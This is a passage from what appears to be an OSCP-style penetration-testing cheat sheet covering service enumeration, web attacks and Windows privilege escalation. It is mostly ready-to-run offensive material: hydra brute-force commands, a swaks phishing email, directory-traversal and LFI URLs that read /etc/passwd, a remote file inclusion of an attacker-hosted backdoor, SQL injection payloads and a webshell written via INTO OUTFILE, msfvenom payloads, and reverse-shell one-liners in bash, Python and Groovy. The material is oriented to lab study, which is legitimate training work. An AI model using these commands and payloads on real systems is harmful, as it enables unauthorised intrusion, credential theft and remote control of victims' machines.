you have relevant creds, or based on the nmap scan find out whether anonymous login is allowed, then log in with anonymous:password 776 | 777 | put #uploading file 778 | get #downloading file 779 | 780 | #NSE 781 | locate .nse | grep ftp 782 | nmap -p21 --script= 783 | 784 | #bruteforce 785 | hydra -L users.txt -P passwords.txt ftp #'-L' for usernames list, '-l' for username and vice-versa 786 | hydra -l offsec -P /usr/share/seclists/Passwords/500-worst-passwords.txt ftp 787 | 788 | #check for vulnerabilities associated with the version identified. 789 | ``` 790 | 791 | ## SSH enumeration 792 | 793 | ```powershell 794 | #Login 795 | ssh uname@IP #enter password in the prompt 796 | 797 | #id_rsa or id_ecdsa file 798 | chmod 600 id_rsa/id_ecdsa 799 | ssh uname@IP -i id_rsa/id_ecdsa #if it still asks for a passphrase, crack it using John 800 | 801 | #cracking id_rsa or id_ecdsa 802 | ssh2john id_ecdsa(or)id_rsa > hash 803 | john --wordlist=/home/sathvik/Wordlists/rockyou.txt hash 804 | 805 | #bruteforce 806 | hydra -l uname -P passwords.txt ssh #'-L' for usernames list, '-l' for username and vice-versa 807 | hydra -L users.txt -P pass.txt ssh -s 2222 808 | hydra -l offsec -P /usr/share/seclists/Passwords/500-worst-passwords.txt ssh 809 | 810 | #check for vulnerabilities associated with the version identified.
811 | ``` 812 | 813 | ## SMB enumeration 814 | 815 | ```powershell 816 | sudo nbtscan -r 192.168.50.0/24 #IP or range can be provided 817 | 818 | #NSE scripts can be used 819 | locate .nse | grep smb 820 | nmap -p445 --script="name" $IP 821 | 822 | #In windows we can view like this 823 | net view \\ /all 824 | 825 | #crackmapexec 826 | crackmapexec smb 827 | crackmapexec smb 192.168.1.100 -u username -p password 828 | crackmapexec smb 192.168.1.100 -u username -p password --shares #lists available shares 829 | crackmapexec smb 192.168.1.100 -u username -p password --users #lists users 830 | crackmapexec smb 192.168.1.100 -u username -p password --all #all information 831 | crackmapexec smb 192.168.1.100 -u username -p password -p 445 --shares #specific port 832 | crackmapexec smb 192.168.1.100 -u username -p password -d mydomain --shares #specific domain 833 | #In place of username and password, we can pass usernames.txt and passwords.txt for password-spraying or bruteforcing. 834 | 835 | # Smbclient 836 | smbclient -L //IP #or try with 4 /'s 837 | smbclient //server/share 838 | smbclient //server/share -U 839 | smbclient //server/share -U domain/username 840 | 841 | #SMBmap 842 | smbmap -H 843 | smbmap -H -u -p 844 | smbmap -H -u -p -d 845 | smbmap -H -u -p -r 846 | 847 | #Within SMB session 848 | put #to upload file 849 | get #to download file 850 | ``` 851 | 852 | - Downloading shares made easy - if the folder contains several files, they will all be downloaded by this. 853 | 854 | ```powershell 855 | mask "" 856 | recurse ON 857 | prompt OFF 858 | mget * 859 | ``` 860 | 861 | ## HTTP/S enumeration 862 | 863 | - Check with `whatweb 'URL'` 864 | - View the source code and identify any hidden content. If an image looks suspicious, download it and try to find hidden data in it. 865 | - Identify the version or CMS and check for active exploits. This can be done using Nmap and Wappalyzer.
- Check the /robots.txt file
- Also check whether there is any file upload utility (and obtain the location where uploaded files are reflected)
[https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS) 939 | 940 | ```powershell 941 | host www.megacorpone.com 942 | host -t mx megacorpone.com 943 | host -t txt megacorpone.com 944 | 945 | for ip in $(cat list.txt); do host $ip.megacorpone.com; done #DNS Bruteforce 946 | for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found" #bash bruteforcer to find domain name 947 | 948 | ## DNS Recon 949 | dnsrecon -d megacorpone.com -t std #standard recon 950 | dnsrecon -d megacorpone.com -D ~/list.txt -t brt #bruteforce, hence we provided list 951 | 952 | # DNS Bruteforce using dnsenum 953 | dnsenum megacorpone.com 954 | 955 | ## NSlookup, a gold mine 956 | nslookup mail.megacorptwo.com 957 | nslookup -type=TXT info.megacorptwo.com 192.168.50.151 #We are querying the information from a specific IP, here it is 192.168.50.151. This can be very useful 958 | ``` 959 | 960 | ## SMTP enumeration 961 | 962 | ```powershell 963 | nc -nv 25 #Version Detection 964 | smtp-user-enum -M VRFY -U username.txt -t # -M means mode, it can be RCPT, VRFY, EXPN 965 | 966 | #Sending emain with valid credentials, the below is an example for Phishing mail attack 967 | sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap 968 | ``` 969 | 970 | ## LDAP Enumeration 971 | 972 | ```powershell 973 | ldapsearch -x -H ldap://: # try on both ldap and ldaps, this is first command to run if you dont have any valid credentials. 
974 | 975 | ldapsearch -x -H ldap:// -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=" 976 | ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" 977 | #CN name describes the info w're collecting 978 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=" 979 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=" 980 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" 981 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=" 982 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" 983 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" 984 | ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" 985 | 986 | #windapsearch.py 987 | #for computers 988 | python3 windapsearch.py --dc-ip -u -p --computers 989 | 990 | #for groups 991 | python3 windapsearch.py --dc-ip -u -p --groups 992 | 993 | #for users 994 | python3 windapsearch.py --dc-ip -u -p --da 995 | 996 | #for privileged users 997 | python3 windapsearch.py --dc-ip -u -p --privileged-users 998 | ``` 999 | 1000 | ## NFS Enumeration 1001 | 1002 | ```powershell 1003 | nmap -sV --script=nfs-showmount 1004 | showmount -e 1005 | ``` 1006 | 1007 | ## SNMP Enumeration 1008 | 1009 | ```powershell 1010 | #Nmap UDP scan 1011 | sudo nmap -A -T4 -p- -sU -v -oN nmap-udpscan.txt 1012 | 1013 | snmpcheck -t -c public #Better version than snmpwalk as it displays more user friendly 1014 | 1015 | snmpwalk -c public -v1 -t 10 #Displays entire MIB tree, MIB Means Management Information Base 1016 | snmpwalk -c public -v1 1.3.6.1.4.1.77.1.2.25 #Windows User enumeration 1017 | snmpwalk -c public -v1 1.3.6.1.2.1.25.4.2.1.2 #Windows Processes enumeration 1018 | snmpwalk -c public -v1 1.3.6.1.2.1.25.6.3.1.2 #Installed software enumeraion 1019 | snmpwalk -c public -v1 1.3.6.1.2.1.6.13.1.3 #Opened 
TCP Ports 1020 | 1021 | #Windows MIB values 1022 | 1.3.6.1.2.1.25.1.6.0 - System Processes 1023 | 1.3.6.1.2.1.25.4.2.1.2 - Running Programs 1024 | 1.3.6.1.2.1.25.4.2.1.4 - Processes Path 1025 | 1.3.6.1.2.1.25.2.3.1.4 - Storage Units 1026 | 1.3.6.1.2.1.25.6.3.1.2 - Software Name 1027 | 1.3.6.1.4.1.77.1.2.25 - User Accounts 1028 | 1.3.6.1.2.1.6.13.1.3 - TCP Local Ports 1029 | ``` 1030 | 1031 | ## RPC Enumeration 1032 | 1033 | ```powershell 1034 | rpcclient -U=user $IP 1035 | rpcclient -U="" $IP #Anonymous login 1036 | ##Commands within in RPCclient 1037 | srvinfo 1038 | enumdomusers #users 1039 | enumpriv #like "whoami /priv" 1040 | queryuser #detailed user info 1041 | getuserdompwinfo #password policy, get user-RID from previous command 1042 | lookupnames #SID of specified user 1043 | createdomuser #Creating a user 1044 | deletedomuser 1045 | enumdomains 1046 | enumdomgroups 1047 | querygroup #get rid from previous command 1048 | querydispinfo #description of all users 1049 | netshareenum #Share enumeration, this only comesup if the current user we're logged in has permissions 1050 | netshareenumall 1051 | lsaenumsid #SID of all users 1052 | ``` 1053 | 1054 | --- 1055 | 1056 | # Web Attacks 1057 | 1058 | 1062 | 1063 | ## Directory Traversal 1064 | 1065 | ```powershell 1066 | cat /etc/passwd #displaying content through absolute path 1067 | cat ../../../etc/passwd #relative path 1068 | 1069 | # if the pwd is /var/log/ then in order to view the /etc/passwd it will be like this 1070 | cat ../../etc/passwd 1071 | 1072 | #In web int should be exploited like this, find a parameters and test it out 1073 | http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd 1074 | #check for id_rsa, id_ecdsa 1075 | #If the output is not getting formatted properly then, 1076 | curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd 1077 | 1078 | #For windows 1079 | 
http://192.168.221.193:3000/public/plugins/alertlist/../../../../../../../../Users/install.txt #no need to provide drive 1080 | ``` 1081 | 1082 | - URL Encoding 1083 | 1084 | ```powershell 1085 | #Sometimes it doesn't show if we try path, then we need to encode them 1086 | curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 1087 | ``` 1088 | 1089 | - Wordpress 1090 | - Simple exploit: https://github.com/leonjza/wordpress-shell 1091 | 1092 | ## Local File Inclusion 1093 | 1094 | - Main difference between Directory traversal and this attack is, here we’re able to execute commands remotely. 1095 | 1096 | ```powershell 1097 | #At first we need 1098 | http://192.168.45.125/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=whoami #we're passing a command here 1099 | 1100 | #Reverse shells 1101 | bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1" 1102 | #We can simply pass a reverse shell to the cmd parameter and obtain reverse-shell 1103 | bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22 #encoded version of above reverse-shell 1104 | 1105 | #PHP wrapper 1106 | curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain," 1107 | curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php 1108 | ``` 1109 | 1110 | - Remote file inclusion 1111 | 1112 | ```powershell 1113 | 1. Obtain a php shell 1114 | 2. host a file server 1115 | 3. 1116 | http://mountaindesserts.com/meteor/index.php?page=http://attacker-ip/simple-backdoor.php&cmd=ls 1117 | we can also host a php reverseshell and obtain shell. 
1118 | ``` 1119 | 1120 | ## SQL Injection 1121 | 1122 | ```powershell 1123 | admin' or '1'='1 1124 | ' or '1'='1 1125 | " or "1"="1 1126 | " or "1"="1"-- 1127 | " or "1"="1"/* 1128 | " or "1"="1"# 1129 | " or 1=1 1130 | " or 1=1 -- 1131 | " or 1=1 - 1132 | " or 1=1-- 1133 | " or 1=1/* 1134 | " or 1=1# 1135 | " or 1=1- 1136 | ") or "1"="1 1137 | ") or "1"="1"-- 1138 | ") or "1"="1"/* 1139 | ") or "1"="1"# 1140 | ") or ("1"="1 1141 | ") or ("1"="1"-- 1142 | ") or ("1"="1"/* 1143 | ") or ("1"="1"# 1144 | ) or '1`='1- 1145 | ``` 1146 | 1147 | - Blind SQL Injection - This can be identified by Time-based SQLI 1148 | 1149 | ```powershell 1150 | #Application takes some time to reload, here it is 3 seconds 1151 | http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- // 1152 | ``` 1153 | 1154 | - Manual Code Execution 1155 | 1156 | ```powershell 1157 | kali> impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth #To login 1158 | EXECUTE sp_configure 'show advanced options', 1; 1159 | RECONFIGURE; 1160 | EXECUTE sp_configure 'xp_cmdshell', 1; 1161 | RECONFIGURE; 1162 | #Now we can run commands 1163 | EXECUTE xp_cmdshell 'whoami'; 1164 | 1165 | #Sometimes we may not have direct access to convert it to RCE from web, then follow below steps 1166 | ' UNION SELECT "", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- // #Writing into a new file 1167 | #Now we can exploit it 1168 | http://192.168.45.285/tmp/webshell.php?cmd=id #Command execution 1169 | ``` 1170 | 1171 | - SQLMap - Automated Code execution 1172 | 1173 | ```powershell 1174 | sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user #Testing on parameter names "user", we'll get confirmation 1175 | sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump #Dumping database 1176 | 1177 | #OS Shell 1178 | # Obtain the Post request from Burp suite and save it to post.txt 1179 | sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp" 
#/var/www/html/tmp is the writable folder on target, hence we're writing there 1180 | 1181 | ``` 1182 | 1183 | --- 1184 | 1185 | # Exploitation 1186 | 1187 | ## Finding Exploits 1188 | 1189 | ### Searchsploit 1190 | 1191 | ```bash 1192 | searchsploit 1193 | searchsploit -m windows/remote/46697.py #Copies the exploit to the current location 1194 | ``` 1195 | 1196 | ## Reverse Shells 1197 | 1198 | ### Msfvenom 1199 | 1200 | ```powershell 1201 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe 1202 | msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe 1203 | 1204 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.asp 1205 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 1206 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 1207 | msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php 1208 | ``` 1209 | 1210 | ### One Liners 1211 | 1212 | ```powershell 1213 | bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 1214 | python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 1215 | & /dev/tcp/10.11.0.106/443 0>&1');?> 1216 | #For powershell use the encrypted tool that's in Tools folder 1217 | ``` 1218 | 1219 | 1223 | 1224 | ### Groovy reverse-shell 1225 | 1226 | - For Jenkins 1227 | 1228 | ```powershell 1229 | String host="localhost"; 1230 | int port=8044; 1231 | String cmd="cmd.exe"; 1232 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try 
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); 1233 | ``` 1234 | 1235 | --- 1236 | 1237 | # Windows Privilege Escalation 1238 | 1239 | 1243 | 1244 | ## Manual Enumeration commands 1245 | 1246 | ```bash 1247 | #Groups we're part of 1248 | whoami /groups 1249 | 1250 | whoami /all #lists everything we own. 1251 | 1252 | #Starting, Restarting and Stopping services in Powershell 1253 | Start-Service 1254 | Stop-Service 1255 | Restart-Service 1256 | 1257 | #Powershell History 1258 | Get-History 1259 | (Get-PSReadlineOption).HistorySavePath #displays the path of consoleHost_history.txt 1260 | type C:\Users\sathvik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 1261 | 1262 | #Viewing installed execuatbles 1263 | Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname 1264 | Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname 1265 | 1266 | #Process Information 1267 | Get-Process 1268 | Get-Process | Select ProcessName,Path 1269 | 1270 | #Sensitive info in XAMPP Directory 1271 | Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue 1272 | Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue #this for a specific user 1273 | 1274 | #Service Information 1275 | Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} 1276 | ``` 1277 | 1278 | ## Automated Scripts 1279 | 1280 | ```bash 1281 | winpeas.exe 1282 | winpeas.bat 1283 | Jaws-enum.ps1 1284 | powerup.ps1 1285 | PrivescCheck.ps1 1286 | ``` 1287 | 1288 | ## Token Impersonation 1289 | 1290 | 1291 | 1292 | - Command to check `whoami /priv` 1293 | 1294 | ```powershell 1295 | #Printspoofer 1296 | PrintSpoofer.exe -i -c powershell.exe 1297 | PrintSpoofer.exe -c "nc.exe -e cmd" 1298 | 1299 | #RoguePotato 1300 
| RoguePotato.exe -r -e "shell.exe" -l 9999 1301 | 1302 | #GodPotato 1303 | GodPotato.exe -cmd "cmd /c whoami" 1304 | GodPotato.exe -cmd "shell.exe" 1305 | 1306 | #JuicyPotatoNG 1307 | JuicyPotatoNG.exe -t * -p "shell.exe" -a 1308 | 1309 | #SharpEfsPotato 1310 | SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" 1311 | #writes whoami command to w.log file 1312 | ``` 1313 | 1314 | ## Services 1315 | 1316 | ### Binary Hijacking 1317 | 1318 | ```powershell 1319 | #Identify service from winpeas 1320 | icalcs "path" #F means full permission, we need to check we have full access on folder 1321 | sc qc #find binarypath variable 1322 | sc config